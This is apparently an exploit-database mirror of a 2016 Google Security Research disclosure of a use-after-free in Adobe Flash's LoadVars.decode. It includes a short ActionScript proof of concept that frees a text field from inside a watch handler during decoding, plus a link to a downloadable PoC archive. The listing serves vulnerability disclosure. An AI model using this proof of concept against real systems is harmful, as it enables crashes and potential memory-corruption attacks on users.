Lucene search

K
zdtGoogle Security Research1337DAY-ID-25833
HistoryFeb 17, 2016 - 12:00 a.m.

Adobe Flash - LoadVars.decode Use-After-Free

2016-02-1700:00:00
Google Security Research
0day.today
16

0.842 High

EPSS

Percentile

98.5%

Exploit for multiple platform in category dos / poc

Source: https://code.google.com/p/google-security-research/issues/detail?id=667
 
There is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows:
 
var lv = new LoadVars();
var f = lv.decode;
var tf = this.createTextField("tf",1, 2, 3, 4, 5);
tf.natalie = "not test";
tf.watch("natalie", func);
f.call(tf, "natalie=test&bob=1");
trace(tf.natalie);
 
 
function func(){
     
    trace("here");
    tf.removeTextField();   
    return "test";
 
    }
     
 
A sample swf and fla are attached. This issue was reproduced in Chrome on 64-bit Ubuntu.
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39463.zip

#  0day.today [2018-04-11]  #